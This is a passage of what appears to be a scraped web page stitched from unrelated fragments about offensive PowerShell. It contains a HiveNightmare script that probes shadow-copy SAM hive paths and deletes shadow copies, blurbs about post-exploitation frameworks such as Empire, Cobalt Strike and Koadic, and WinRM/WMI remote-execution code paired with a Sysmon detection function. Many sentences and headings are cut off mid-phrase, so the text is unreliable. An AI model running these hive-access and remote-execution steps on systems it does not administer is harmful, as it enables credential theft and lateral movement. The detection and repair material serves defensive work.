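    # Condition 2: a shadow copy from which a standard user can open the SAM.
    # This is the path the public PoC reads; opening it needs no privilege if
    # the copy exists and carries the bad ACL.
    $readable = foreach ($i in 1..$MaxShadowIndex) {
        $p = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$i\Windows\System32\config\SAM"
        try {
            $fs = [System.IO.File]::OpenRead($p); $fs.Close(); $p
        } catch { }
    }

    [pscustomobject]@{
        ExposedHives         = @($exposed)
        ReadableShadowCopies = @($readable)
        Exploitable          = (@($exposed).Count -gt 0) -and (@($readable).Count -gt 0)
    }
}

function Repair-HiveNightmare {
    # Microsoft's workaround (run elevated): re-enable inheritance on the hive
    # files, then delete the shadow copies that still hold the bad ACL. New
    # shadow copies taken afterwards inherit the corrected permissions.
    icacls "$env:windir\system32\config\*.*" /inheritance:e
    vssadmin delete shadows /for=$env:SystemDrive /quiet
}

Test-HiveNightmare
```

Deleting shadow copies also removes restore points, so on a server confirm the backup posture before running the repair; the ACL fix alone closes the hole for any shadow copy created from that point on.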

The exploit we will see today is a post-exploitation Metasploit module that performs PowerShell enumeration on Windows. Windows PowerShell is a task automation and configuration management framework designed by Microsoft which consists of a command-line shell and associated scripting language built on the .NET Framework and .NET Core.

p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of post exploitation easier.

Recently, Microsoft issued the patch for CVE-2020-1472 a.k.a. Zerologon, a critical vulnerability that allows an attacker without credentials to elevate to the highest possible privileges in the domain. So, you have applied the patch to all your systems, especially all your domain controllers (DC).

PowerSploit: PowerShell Post-Exploitation Framework

Cobalt Strike's Beacon now has the ability to work with PowerShell. Import a script into Beacon and invoke its cmdlets at will. This opens up a world of poss..

RomBuster. RomBuster is a router exploitation tool that allows disclosure of a network router's admin password. Features: exploits vulnerabilities in most popular routers such as D-Link, Zyxel, TP-Link and Huawei; optimized to exploit multiple routers at one time from a list.

PowerShellArmoury - A PowerShell Armoury For Security Guys And Girls. CSIRT-Collect - PowerShell Script To Collect Memory And (Triage) Disk Forensics. Ruse - Mobile Camera-Based Application That Attempts To Alter Photos To Preserve Their Utility To Humans While Making Them Unusable For Facial Recognition Systems.

A recent proof-of-concept exploit was published (and quickly deleted) containing an unpatched 0-day in all supported Windows operating systems. Unfortunately, by the time the exploit was deleted, the proof of concept was already forked and is now used by adversaries in the wild with a heavy focus on exploiting Domain Controllers to gain full domain compromise.

The mass exploitation of Exchange Servers has been a wake-up call, and it will take all parties playing in concert for the industry to react, respond, and recover. a PowerShell alias for.

PowerShell Commands for Pentesters - InfosecMatte

  1. PowerZure is a framework designed to perform reconnaissance and exploitation of the Azure cloud platform, Azure Active Directory, and associated resources. The project [1] is maintained by Ryan Hausknecht, who recently released a new version (2.0) of the framework. The tool is now equipped with the following attack components and functions: operational functions with backdoor/payload.
  2. Recently, PowerShell has often been used in post-exploitation. PowerShell Empire is a well-known tool implemented as a post-exploitation framework using PowerShell. For this reason, we set the PowerShell Empire modules (204 modules) as the agent action list A. A is classified into 12 groups by their characteristics.
  3. Cobalt Strike (CS) is a paid penetration testing toolkit that allows an attacker to deploy a component named Beacon on a victim's machine. The simplicity, reliability, and versatility of CS make it very popular among threat actors, and there are plenty of cracked versions of CS available on the dark web [1]. Given this reality, it's been.
  4. In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft's Exchange Server by an attacker referred to as HAFNIUM. One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most.

Mass exploitation of on-prem Exchange servers :(. On the afternoon of March 1st, an MSP partner reached out and warned our team about possible undisclosed Exchange vulnerabilities being successfully exploited on on-prem servers. We confirmed the activity and Microsoft has since released an initial blog and emergency patches for the vulnerabilities.

WMImplant - A WMI Based Agentless Post-Exploitation RAT Developed in PowerShell. March 23, 2017 | by Christopher Truncer. Just over one year ago (November 2015), I released WMIOps, a PowerShell script that enables a user to carry out different actions via Windows Management Instrumentation (WMI) on the local machine or a remote machine.

PowerShell Remoting is essentially a native Windows remote command execution feature that's built on top of the Windows Remote Management (WinRM) protocol. Based on my super Google results, WinRM is supported by Windows Vista with Service Pack 1 or later, Windows 7, Windows Server 2008, and Windows Server 2012.
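The two native remote-execution paths that the earlier snippet on this page (PsExec replaced by Invoke-Command or Enter-PSSession) and the two posts above describe, shown side by side as an added example that is not from either post, together with the parent-process artefact each leaves on the target. The host name and the command are assumptions; both calls need an account that is an administrator on the target, and the DCOM session is used explicitly because Invoke-CimMethod with -ComputerName would otherwise go over WinRM too.

```powershell
# Added example: PowerShell Remoting (WinRM) versus WMI process creation (DCOM).
function Invoke-RemoteNative {
    param(
        [Parameter(Mandatory)][string]$ComputerName,               # assumption: a host you administer
        [string]$Command = 'whoami /all > C:\Windows\Temp\who.txt' # assumption: any command
    )
    # Path 1: PowerShell Remoting over WinRM (TCP 5985/5986). The remote side
    # runs inside wsmprovhost.exe, so any child process has wsmprovhost.exe as
    # its parent, and the session is recorded in Microsoft-Windows-WinRM/Operational.
    $viaWinRM = Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        param($c) cmd.exe /c $c; $env:COMPUTERNAME
    } -ArgumentList $Command

    # Path 2: WMI Win32_Process.Create over DCOM (TCP 135 plus a dynamic port).
    # The process is spawned by WmiPrvSE.exe, which is the parent relationship
    # to alert on (cmd.exe or powershell.exe under WmiPrvSE.exe).
    $opt  = New-CimSessionOption -Protocol Dcom
    $sess = New-CimSession -ComputerName $ComputerName -SessionOption $opt
    $viaWmi = Invoke-CimMethod -CimSession $sess -ClassName Win32_Process -MethodName Create `
                -Arguments @{ CommandLine = "cmd.exe /c $Command" }
    Remove-CimSession $sess

    [pscustomobject]@{
        WinRMHost    = $viaWinRM | Select-Object -Last 1
        WmiReturn    = $viaWmi.ReturnValue   # 0 means the process was created
        WmiProcessId = $viaWmi.ProcessId
    }
}

# Defender's counterpart: surface both parent-process patterns from Sysmon
# Event ID 1 (process creation) on the target host.
function Find-RemoteExecParents {
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'; Id = 1
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue | ForEach-Object {
        # Flatten the EventData fields of the Sysmon event into a hashtable.
        $x = [xml]$_.ToXml(); $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $d
    } | Where-Object { $_.ParentImage -match '\\(wsmprovhost|WmiPrvSE)\.exe$' } |
      Select-Object @{n='Parent';e={$_.ParentImage}}, @{n='Child';e={$_.Image}},
                    @{n='CommandLine';e={$_.CommandLine}}, @{n='User';e={$_.User}}
}

# Invoke-RemoteNative -ComputerName server01
# Find-RemoteExecParents | Format-Table -AutoSize
```

Neither path writes a file or a service like PsExec does, which is why the snippet above calls this "extremely basic usage" that evades detection; the parent-process relationship and, for remoting, the 4103/4104 events on the target are what remain.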

Hacking with Empire - PowerShell Post-Exploitation Agen

PowerSploit - A PowerShell Post-Exploitation Framewor

Microsoft Exchange exploitation: how to detect, mitigate

Trouble with HAFNIUM (CVE-2021-26855) indicator of exploitation PowerShell. By leedavila, Mar 3, 2021, 21:42 UTC. Solved: Microsoft Exchange.

PowerShell, upgrade it, and start a PowerShell session using the ISE. Discover PowerShell commands and cmdlets and understand PowerShell formatting. Use the PowerShell help system to understand what particular cmdlets do. Utilise the pipeline to perform typical data manipulation. Package your code i

How to get the Linux Bash shell on Windows 10
Offensive PowerShell toolkits

Video: Command and Scripting Interpreter: PowerShell, Sub

Koadic - COM Command & Control Framework (JScript RAT
Repair a corrupted Windows 10 system with the
Extracting Password Hashes from the Ntds
CVE-2020-2883: Oracle WebLogic Deserialization
Koadic – Windows post Exploitation tools